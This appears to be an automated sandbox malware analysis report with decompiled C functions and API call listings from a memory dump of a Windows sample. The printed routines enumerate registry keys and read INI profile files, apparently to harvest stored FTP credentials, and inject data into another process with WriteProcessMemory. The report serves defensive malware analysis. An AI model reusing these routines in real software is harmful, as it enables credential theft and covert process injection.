0x00412391
0x00412396
0x0041239c
0x0041239c
0x0041234c
0x004123a8
0x004123ae
0x004123b1
0x004123b3
0x00412466
0x0041246b
0x0041246d
0x00412470
0x00412472
0x00412487
0x00412487
0x00412472
0x00412490
0x00412498
0x00412499
0x0041249e
0x004124b0
0x004124b2
0x004124b7
0x004124bd
0x004124bd
0x004124b7
0x004124b0
0x004124c9
0x004124ca
0x00412543
0x00412548
0x00000000
0x00000000
0x00000000
0x004124cc
0x004124d0
0x0041254e
0x00412552
0x004126c0
0x004126c5
0x004126cf
0x004126d1
0x004126d1
0x004126db
0x004126e8
0x004126e8
0x004126db
0x004126f7
0x004126f7
0x00412558
0x0041255b
0x00412562
0x00412577
0x0041257c
0x004125b6
0x004125b9
0x004126bb
0x004126bb
0x00000000
0x004126bb
0x004125bf
0x004125c5
0x004125cc
0x004125cd
0x004125cf
0x004125cf
0x004125d5
0x004125d7
0x004125d9
0x00000000
0x00000000
0x004125e3
0x004125f0
0x004125f5
0x004125f9
0x00412601
0x0041260a
0x00412619
0x00412629
0x00412634
0x00412635
0x00412640
0x00412641
0x00412646
0x0041264a
0x00412651
0x00412653
0x00412653
0x00412658
0x0041265d
0x0041265f
0x0041265f
0x00412669
0x0041266b
0x0041266b
0x0041266f
0x00412670
0x00412671
0x00412672
0x00412690
0x00412695
0x0041269b
0x0041269b
0x004126a0
0x004126a0
0x004126a9
0x004126af
0x004126b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004126b9
0x00412586
0x00412588
0x0041258a
0x0041258c
0x00000000
0x00000000
0x00412592
0x00412595
0x00000000
0x00000000
0x00000000
0x00000000
0x00412597
0x00412597
0x00412597
0x0041259a
0x0041259d
0x004125a5
0x004125a8
0x004125aa
0x004125aa
0x0041259f
0x0041259f
0x0041259f
0x004125ae
0x004125af
0x004125af
0x00000000
0x004125b4
0x00412566
0x0041256a
0x0041256b
0x00412572
0x00412573
0x00000000
0x004124d7
0x0041254a
0x0041254a
0x00000000
0x0041254a
0x004124d0
0x004124ca
0x004123c8
0x004123cd
0x004123d1
0x004123d3
0x004123de
0x0041245b
0x0041245f
0x00412464
0x00000000
0x00000000
0x00000000
0x00000000
0x004123e0
0x004123e0
0x004123e0
0x004123e0
0x004123e6
0x00000000
0x00000000
0x004123e8
0x004123ec
0x0041240c
0x0041240c
0x0041240e
0x00412411
0x00412416
0x0041241f
0x00000000
0x00000000
0x00412424
0x00412427
0x00412442
0x00412442
0x00412447
0x0041244a
0x00000000
0x00000000
0x00000000
0x0041244a
0x00412429
0x0041242a
0x00412539
0x00000000
0x00412539
0x00412430
0x00412431
0x004124db
0x004124e4
0x004124f0
0x004124fe
0x00412505
0x0041250d
0x00412513
0x00412516
0x0041251c
0x00412521
0x0041252f
0x0041252f
0x00412521
0x00000000
0x00412516
0x00412437
0x00412438
0x0041243d
0x00000000
0x00000000
0x00000000
0x00000000
0x00412438
0x004123f0
0x00000000
0x00412406
0x004123f4
0x00000000
0x00412402
0x004123f8
0x004123fe
0x00000000
0x004123fa
0x004123fa
0x00000000
0x004123fa
0x0041244c
0x0041244e
0x00412455
0x00412457
0x00000000

APIs

EnterCriticalSection.KERNEL32 ref: 00412322
LeaveCriticalSection.KERNEL32(00421234), ref: 004123A8
InternetCrackUrlA.WININET ref: 0041250D

Part of subcall function 0041B264: CreateMutexW.KERNEL32(004218A0,00000000,00421E40,00421234,?,?,00412353,00000000,00000000), ref: 0041B28C

Part of subcall function 0040868F: HeapFree.KERNEL32(00000000,00000000,0040D109,00000000,?,?), ref: 004086A2

InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00412620

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
String ID:
API String ID: 4018265435-0
Opcode ID: a7315a417a723f25ac35ca799f02d4d6d61c3ce8b553f06ec0508dad5c82c38b
Instruction ID: c6cb61c57bdca5b0b6105cb5c4c3c0afa5196a1281994f62fbdb4e46b4786cc9
Opcode Fuzzy Hash: a7315a417a723f25ac35ca799f02d4d6d61c3ce8b553f06ec0508dad5c82c38b
Instruction Fuzzy Hash: 15B1D330504341AEDB20DF24CA41BEB7BD6AB84314F04092FF985E62A2C7B8D9E5875E

Uniqueness

Uniqueness Score: -1.00%

Function 004182FD Relevance: 6.2, APIs: 4, Instructions: 190
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004182FD(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;
				void* _t78;
				intOrPtr _t92;
				int _t104;
				void* _t111;
				intOrPtr _t113;
				void* _t116;
				int _t121;
				void* _t126;
				void* _t133;
				void* _t136;
				void* _t137;

				_t120 = __edx;
				_t119 = __ecx;
				_t121 = 0;
				E00408742( &_v32,  &_v32, 0, 8);
				_t65 = E0040865F(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t121) {
						return E0040868F(_v32);
					}
					_push(0x65);
					return E00416E46(_t120, _v32);
				} else {
					_v36 = _t65 + 0x3fc;
					_t70 = 0x60;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E00412F05(_t70,  &_v260);
					_t72 = 0x61;
					E00412F05(_t72,  &_v88);
					_t74 = 0x62;
					E00412F05(_t74,  &_v132);
					_t76 = 0x63;
					E00412F05(_t76,  &_v68);
					_t78 = 0x64;
					E00412F05(_t78,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t136 + _v12 * 4 - 0x2c),  &_v260, _t121, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t121;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t121,  &_v780,  &_v20, _t121, _t121, _t121, _t121) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t123 = _v16;
							_v24 = _v24 + 1;
							_t92 = E0040C7E3(_v8, _t119, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 > 0) {
								_t133 = E0040C7E3(_v8, _t119, _t123 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t133 != 0xffffffff && _t133 > 0) {
									_t125 = _v36;
									_t104 = E0040C7E3(_v8, _t119, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 > 0 && E00418242(_t120, _t125, _t133 + _v40) > 0) {
										_t126 = E0040C896(_v8, _t119,  &_v780,  &_v132);
										if(_t126 < 1 || _t126 > 0xffff) {
											_t126 = 0x15;
										}
										_t135 =  &_v172;
										_t111 = 0x2b;
										E00412F05(_t111,  &_v172);
										_t113 = _v16;
										_t119 = _v36;
										_push(_t126);
										_push(_t113);
										_push(_t119);
										_push(_t113 + 0x1fe);
										_t120 = 0x311;
										_t127 = _t119 + 0x1fe;
										_t116 = E00409450(_t135, 0x311, _t119 + 0x1fe, _t135);
										_t137 = _t137 + 0x14;
										if(_t116 > 0) {
											_t119 =  &_v32;
											if(E00408A85(_t116,  &_v32, _t127) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t121 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E0040868F(_v16);
					goto L22;
				}
			}

0x004182fd
0x004182fd
0x0041830b
0x00418312
0x0041831c
0x00418321
0x00418326
0x00418517
0x0041851a
0x00000000
0x0041852c
0x0041851f
0x00000000
0x0041832c
0x00418333
0x0041833c
0x0041833d
0x00418344
0x0041834b
0x00418355
0x00418356
0x00418360
0x00418361
0x0041836b
0x0041836c
0x00418376
0x00418377
0x0041837c
0x00418384
0x004183a1
0x00000000
0x00000000
0x004183ba
0x004183bd
0x004183cc
0x004184f9
0x004184fc
0x00000000
0x00000000
0x00000000
0x00000000
0x004184cb
0x004184df
0x004184f1
0x004183d2
0x004183d2
0x004183d5
0x004183e7
0x004183ec
0x004183f2
0x0041841a
0x0041841f
0x0041842d
0x0041843f
0x00418444
0x0041844a
0x00418472
0x00418477
0x00418483
0x00418483
0x00418486
0x0041848c
0x0041848d
0x00418492
0x00418495
0x00418498
0x00418499
0x0041849a
0x004184a0
0x004184a4
0x004184a9
0x004184af
0x004184b4
0x004184b9
0x004184bc
0x004184c6
0x004184c8
0x004184c8
0x004184c6
0x004184b9
0x0041844a
0x0041841f
0x00000000
0x004184f7
0x004184f7
0x00000000
0x004184f7
0x00418502
0x00418502
0x00418505
0x00418512
0x00000000
0x00418512

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00418399
RegEnumKeyExW.ADVAPI32 ref: 004183C4
RegCloseKey.ADVAPI32(?), ref: 004184FC

Part of subcall function 0040C7E3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,00406E71,?,?,00000104), ref: 0040C7F8

RegEnumKeyExW.ADVAPI32 ref: 004184E9

Part of subcall function 0040C7E3: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,00406E71,?,?,00000104), ref: 0040C876

Part of subcall function 0040C896: RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 0040C8AE

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 75e3b1ba65b373b8c99affe8d32667ed048b4df95bef6d481cf22b0dffd25d42
Instruction ID: 6af36dc7c57e0e4e5901c9e1c07115ab971724d646817aa3bdbf3d446e1a8e4e
Opcode Fuzzy Hash: 75e3b1ba65b373b8c99affe8d32667ed048b4df95bef6d481cf22b0dffd25d42
Instruction Fuzzy Hash: 79619072D00119ABDB10DBA5CD45EEFB7BDEF48304F10066AF904F3191EB789A858B68

Uniqueness

Uniqueness Score: -1.00%

Function 00418880 Relevance: 6.2, APIs: 4, Instructions: 181
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00418880(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t54;
				void* _t55;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				int _t79;
				int _t87;
				int _t91;
				void* _t97;
				void* _t100;
				void* _t101;
				intOrPtr _t105;
				int* _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				char* _t112;
				void* _t113;
				char* _t120;
				void* _t121;

				_t104 = __ecx;
				_t108 = 0;
				E00408742( &_v28,  &_v28, 0, 8);
				_t54 = E0040865F(0xc1c);
				_v16 = _t54;
				if(_t54 == 0) {
					return _t54;
				}
				_t55 = 0x6d;
				E00412F05(_t55,  &_v180);
				_t57 = 0x6e;
				E00412F05(_t57,  &_v64);
				_t59 = 0x6f;
				E00412F05(_t59,  &_v76);
				_t61 = 0x70;
				E00412F05(_t61,  &_v52);
				_t63 = 0x71;
				E00412F05(_t63,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E0040868F(_v16);
					if(_v24 <= _t108) {
						return E0040868F(_v28);
					}
					_push(0x72);
					return E00416E46(0x311, _v28);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t110 = _v16;
						_v20 = _v20 + 1;
						_t79 = E0040C7E3(_v8, _t104, _t110,  &_v700,  &_v64, 0xff);
						_v12 = _t79;
						if(_t79 != 0xffffffff && _t79 > 0) {
							_t111 = _t110 + 0x1fe;
							_v32 = _t111;
							_t87 = E0040C7E3(_v8, _t104, _t111,  &_v700,  &_v52, 0xff);
							_v12 = _t87;
							if(_t87 != 0xffffffff && _t87 > 0) {
								_t112 = _t111 + 0x1fe;
								_t91 = E0040C7E3(_v8, _t104, _t112,  &_v700,  &_v40, 0xff);
								_v12 = _t91;
								if(_t91 != 0xffffffff && _t91 > 0) {
									_t104 = _t112;
									if(E00409301(_t112) > 0) {
										_t113 = E0040C896(_v8, _t104,  &_v700,  &_v76);
										if(_t113 < 1 || _t113 > 0xffff) {
											_t113 = 0x15;
										}
										_t120 =  &_v116;
										_t97 = 0x2b;
										E00412F05(_t97, _t120);
										_t105 = _v16;
										_push(_t113);
										_push(_t105);
										_t100 = _v32 + 0x1fe;
										_push(_t100);
										_push(_t105 + 0x1fe);
										_t104 = _t120;
										_t114 = _t100 + 0x1fe;
										_t101 = E00409450(_t100, 0x311, _t100 + 0x1fe, _t120);
										_t121 = _t121 + 0x14;
										if(_t101 > 0) {
											_t104 =  &_v28;
											if(E00408A85(_t101,  &_v28, _t114) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t108 = 0;
					goto L19;
				}
			}

0x00418880
0x0041888e
0x00418895
0x0041889f
0x004188a4
0x004188a9
0x00418a96
0x00418a96
0x004188b7
0x004188b8
0x004188c2
0x004188c3
0x004188cd
0x004188ce
0x004188d8
0x004188d9
0x004188e3
0x004188e4
0x00418904
0x00418a70
0x00418a73
0x00418a7b
0x00000000
0x00418a8d
0x00418a80
0x00000000
0x00418a83
0x0041891d
0x00418920
0x0041892f
0x00418a67
0x00418a6a
0x00000000
0x00418935
0x0041893a
0x0041893a
0x0041893d
0x0041894f
0x00418954
0x0041895a
0x00418977
0x0041897d
0x00418980
0x00418985
0x0041898b
0x004189a8
0x004189ae
0x004189b3
0x004189b9
0x004189bf
0x004189c8
0x004189dd
0x004189e2
0x004189ee
0x004189ee
0x004189f1
0x004189f4
0x004189f5
0x004189fa
0x00418a00
0x00418a01
0x00418a02
0x00418a07
0x00418a0e
0x00418a0f
0x00418a17
0x00418a1d
0x00418a22
0x00418a27
0x00418a2a
0x00418a34
0x00418a36
0x00418a36
0x00418a34
0x00418a27
0x004189c8
0x004189b9
0x0041898b
0x00418a4d
0x00418a5d
0x00418a65
0x00000000
0x00418a65

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 004188FC
RegEnumKeyExW.ADVAPI32 ref: 00418927
RegCloseKey.ADVAPI32(?), ref: 00418A6A

Part of subcall function 0040C7E3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,00406E71,?,?,00000104), ref: 0040C7F8

RegEnumKeyExW.ADVAPI32 ref: 00418A57

Part of subcall function 0040C7E3: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,00406E71,?,?,00000104), ref: 0040C876

Part of subcall function 0040C896: RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 0040C8AE

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 9023cfb3bf5e5d53fa89db99affab9f5a8a492e5fe4fabea81439717cfb1dcbc
Instruction ID: 98eb2a6405974a0f3acb7afb871f459e11ef802455191e902af38a7b8a949871
Opcode Fuzzy Hash: 9023cfb3bf5e5d53fa89db99affab9f5a8a492e5fe4fabea81439717cfb1dcbc
Instruction Fuzzy Hash: 76517D72D00109ABDB10EBE5DD49AEFB7BDEF44344F14056BB904F3191EB789A818B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040566B Relevance: 6.1, APIs: 4, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040566B(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t66;
				short _t67;
				void* _t68;
				WCHAR* _t71;
				long _t78;

				_t31 = 0xd;
				E00412F05(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E0040DFC5( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0xf;
						E00412F05(_t36,  &_v112);
						_t33 = E0040DFC5( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x10;
								E00412F05(_t42,  &_v60);
								_t44 = 0x11;
								E00412F05(_t44,  &_v84);
								_t46 = 0x12;
								E00412F05(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t68 = 0xa;
									_t71 =  &_v40;
									_t50 = E00409450( &_v60, _t68, _t71);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t71,  &_v84, 0xffffffff,  &_v1704);
									_t78 = _t50;
									if(_t78 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t71,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t78 != 1) {
											_t66 =  &_v664;
											L16:
											_t50 = E004057F1(0, _t66, _a4, _t91);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E0040DFC5( &_v664,  &_v2224,  &_v1184);
										_t91 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t66 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t67 = 0x5c;
											 *_t58 = _t67;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

0x0040567e
0x0040567f
0x00405684
0x00405692
0x0040569a
0x004056aa
0x004056b1
0x004056bc
0x004056bd
0x004056d2
0x004056d9
0x004056e6
0x004056ef
0x004056fa
0x004056fb
0x00405705
0x00405706
0x00405710
0x00405711
0x00405716
0x0040571a
0x0040571e
0x00405722
0x00405725
0x00405726
0x00405729
0x00405733
0x00000000
0x00000000
0x00405749
0x0040574f
0x00405754
0x00000000
0x00000000
0x00405775
0x0040577d
0x004057dd
0x004057dd
0x004057e4
0x00000000
0x00000000
0x00000000
0x004057e4
0x0040577f
0x0040578c
0x004057a1
0x004057a4
0x004057cb
0x004057d1
0x004057d4
0x004057db
0x00000000
0x00000000
0x00000000
0x004057db
0x004057ba
0x004057bf
0x004057c1
0x00000000
0x00000000
0x004057c3
0x00000000
0x00000000
0x00000000
0x00000000
0x0040578e
0x0040578e
0x00405792
0x00405796
0x00405797
0x00405797
0x0040579b
0x0040579c
0x00000000
0x0040578e
0x00000000
0x004057ea
0x004056ef
0x004056d9
0x004056b1
0x004057ee

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00405692

Part of subcall function 0040DFC5: PathCombineW.SHLWAPI(?,?,?,0041A149,?,004218C8,00000000,00000032,?), ref: 0040DFE5

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 004056E6
GetPrivateProfileIntW.KERNEL32 ref: 00405749
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 00405775

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: PathPrivateProfile$AttributesCombineFileFolderString
String ID:
API String ID: 1702184609-0
Opcode ID: 99b3d914be85ed3b579c09b6846db85611809003cffc6f1d06c66307df98792a
Instruction ID: 39ad214a47d388030c5a6ed82f7b35802d2f3541569585c770e01d8785c63121
Opcode Fuzzy Hash: 99b3d914be85ed3b579c09b6846db85611809003cffc6f1d06c66307df98792a
Instruction Fuzzy Hash: C841B072900218AADF20EAA49D84EDFB77DEB09314F0004A7F649F71C1D7749E8A9F58

Uniqueness

Uniqueness Score: -1.00%

Function 00419E13 Relevance: 6.1, APIs: 4, Instructions: 89
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00419E13(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				void _t26;
				void _t43;
				void* _t53;
				void* _t54;

				_t54 = __esi;
				_t53 = __edi;
				_t26 = E0040D02B( *0x42187c, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_push(_t54);
					_a8 = _a8 |  *0x421868 & 0x00000014;
					if(WriteProcessMemory(_t53, 0x421868 -  *0x42187c + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t53, 0x42187c -  *0x42187c + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00419678(0x421d2c, _t53, _v12,  *0x421d2c) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00419678(0x421d30, _t53, _v12,  *0x421d30) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t53, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}

0x00419e13
0x00419e13
0x00419e1f
0x00419e26
0x00419e2b
0x00419e40
0x00419e4d
0x00419e4f
0x00419e4f
0x00419e58
0x00419e62
0x00419e82
0x00419e84
0x00419e84
0x00419ea5
0x00419ea7
0x00419ea7
0x00419ec0
0x00419ec2
0x00419ec2
0x00419edb
0x00419edd
0x00419edd
0x00419ee3
0x00419efa
0x00419ee5
0x00419eef
0x00000000
0x00419eef
0x00419e2d
0x00419e2d
0x00419e2d
0x00419e2d
0x00419eff

APIs

Part of subcall function 0040D02B: IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000), ref: 0040D047

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,?,?,?,00405160,?,00000000), ref: 00419E45
WriteProcessMemory.KERNEL32(00000000,-00000014,?,00000004,00000000,?,?,?,?,00405160,?,00000000), ref: 00419E7E
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000004,00000000,?,?,?,?,00405160,?,00000000), ref: 00419EA0
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,00405160,?,00000000), ref: 00419EEF

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID:
API String ID: 2215616122-0
Opcode ID: 8743bb805e7ee3898689989edf091d477f9c23372509355da03915c717732ebf
Instruction ID: ab679e71a866a7608f6f1f7efbe9e975ee6ec004b3c34bf216ed20a19bd709fb
Opcode Fuzzy Hash: 8743bb805e7ee3898689989edf091d477f9c23372509355da03915c717732ebf
Instruction Fuzzy Hash: 6421B675604249BAEB11DBA4DC80EFE7F78EB19344F4040AAF601E2261D7399D46CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6F8 Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E6F8(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E0040D9FF( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E0040D9DF( *__esi, 0, 0, 2) != 0) {
						_t29 = E0040D9FF( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E00408742( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E0040D9DF( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E0040D9DF( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x0040e6f8
0x0040e6f8
0x0040e709
0x0040e70c
0x0040e714
0x0040e719
0x0040e71e
0x0040e724
0x0040e73f
0x0040e744
0x0040e749
0x0040e74f
0x0040e758
0x0040e76a
0x0040e77d
0x0040e7af
0x0040e7b6
0x0040e7a0
0x0040e7a0
0x0040e7a0
0x0040e77d
0x0040e7be
0x0040e7cd
0x0040e7cd
0x0040e724
0x0040e7d8

APIs

Part of subcall function 0040D9FF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 0040DA14

Part of subcall function 0040D9DF: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,0040E6D1,?,00000000,00000000,00000000,00000000), ref: 0040D9F1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040E779
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0040E792
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040E7B6
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040E7BE

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: 69ece33ab53e097feec440dbefa0a92b19832cbe41ff37a9c3c6a113c84464e7
Instruction ID: 582c00d09b6c57ed6f0e13117cd76dfe90490ca471a9a9c5ce56b90d04c09ced
Opcode Fuzzy Hash: 69ece33ab53e097feec440dbefa0a92b19832cbe41ff37a9c3c6a113c84464e7
Instruction Fuzzy Hash: 6A312C76800108EFDF219FE5CC81EAEBBB9EF44344F14893AF591B61A1D33A89659B14

Uniqueness

Uniqueness Score: -1.00%

Function 004166A2 Relevance: 6.1, APIs: 4, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004166A2(void* __ebx, void* __ecx) {
				char _v20;
				char* _v84;
				char _v92;
				char _v196;
				char _v716;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t31;
				void* _t35;
				void* _t36;
				char _t37;
				void** _t43;

				_t36 = __ecx;
				_t35 = __ebx;
				_t15 =  *(__ebx + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t43 = _t35 + 0x17c;
					E0040A0A5(_t43);
					E0041A0E0(_t36,  &_v716, 1);
					E00419DA0(0x2937498d,  &_v196, 0);
					_t37 = 0x44;
					E00408742( &_v92,  &_v92, 0, _t37);
					_v92 = _t37;
					_v84 =  &_v196;
					ResetEvent( *(_t35 + 0xc));
